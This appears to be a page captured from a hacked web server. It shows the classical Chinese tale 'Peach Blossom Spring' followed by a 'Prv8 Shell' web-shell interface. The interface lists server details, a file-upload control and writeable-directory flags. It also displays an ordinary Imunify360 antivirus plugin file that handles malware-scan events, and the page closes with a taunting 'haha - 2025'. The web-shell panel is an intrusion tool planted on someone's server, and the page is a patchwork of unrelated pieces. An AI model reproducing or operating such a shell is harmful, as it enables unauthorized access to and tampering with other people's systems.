晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/imav/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/imunify360/venv/lib/python3.11/site-packages/imav/plugins/event_hook_executor.py
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
from imav.malwarelib.config import MalwareHitStatus
from imav.malwarelib.model import MalwareHit
from defence360agent.contracts.hook_events import HookEvent
from defence360agent.contracts.messages import MessageType
from defence360agent.contracts.plugins import (
    expect,
)
from defence360agent.hooks.execute import execute_hooks
from defence360agent.plugins.event_hook_executor import EventHookExecutor

EVENTS = (
    HookEvent.MalwareScanningStarted,
    HookEvent.MalwareScanningFinished,
    HookEvent.MalwareCleanupStarted,
    HookEvent.MalwareCleanupFinished,
    HookEvent.MalwareDetectedCritical,
)


async def detected_hook(
    sink, scan_id, scan_type, started, path, total, error=None
):
    total_malicious, hits = MalwareHit.malicious_list(
        by_scan_id=scan_id, ignore_cleaned=True
    )
    if hits:
        malware_detected = HookEvent.MalwareDetectedCritical(
            scan_id=scan_id,
            scan_type=scan_type,
            error=error,
            started=started,
            path=path,
            total_files=total,
            total_malicious=total_malicious,
            DUMP=hits,
        )
        await sink.process_message(malware_detected)


class ImavEventHookExecutor(EventHookExecutor):
    @expect(*EVENTS)
    async def receive_event(self, event):
        self._loop.create_task(execute_hooks(event))

    @expect(MessageType.MalwareCleanup)
    async def process_malware_cleanup(self, message):
        error = message["error"]
        status = "failed" if error else "ok"

        hits = message["hits"]
        cleaned = [h for h in hits if h.status in MalwareHitStatus.RESTORABLE]
        dump = [hit.as_dict() for hit in hits]

        malware_cleanup = HookEvent.MalwareCleanupFinished(
            cleanup_id=message["cleanup_id"],
            started=message["started"],
            error=error,
            total_files=len(hits),
            total_cleaned=len(cleaned),
            status=status,
            DUMP=dump,
        )
        await self._sink.process_message(malware_cleanup)

    @expect(MessageType.MalwareScan)
    async def process_malware_scan(self, message):
        summary = message["summary"]

        # Message without summary means that detached scan is finished
        #  and summary will arrive along with results in another message - this
        #  is when the hooks should be called.
        if not summary.get("path"):
            return

        await detected_hook(
            self._sink,
            summary["scanid"],
            summary["type"],
            summary["started"],
            summary["path"],
            summary["total_files"],
            summary["error"],
        )

haha - 2025